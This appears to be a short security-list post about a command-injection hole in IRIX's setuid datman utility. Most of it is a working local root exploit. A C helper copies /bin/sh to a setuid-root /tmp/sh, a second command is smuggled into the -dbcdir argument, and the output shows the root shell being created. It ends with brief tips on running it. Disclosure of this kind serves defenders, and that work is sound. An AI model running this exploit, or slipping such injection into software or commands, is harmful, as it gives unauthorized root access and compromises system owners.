Irix: datman hole, errata % cat > /tmp/makesh.c main() { seteuid(0); setegid(0); system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); } % cc /tmp/makesh.c -o /tmp/makesh % mv .cddb .cddb.old % touch .cdplayerrc % /usr/sbin/datman -dbcdir "/tmp/blah;/tmp/makesh" Created "/tmp/blah" Converting /home/medc2/yuri/.cdplayerrc into /tmp/blah % ls -l /tmp/sh -r-sr-sr-x 1 root sys 140784 Dec 9 15:24 /tmp/sh* In above example, few dialog windows will pop up after starting datman. Just press enter in each of them. Make sure your DISPLAY is set correctly. Note though you can pass arbitrary shell commands to sh in -dbcdir, these commands will be executed with euid set to your uid, so seteuid(0) needs to be called first.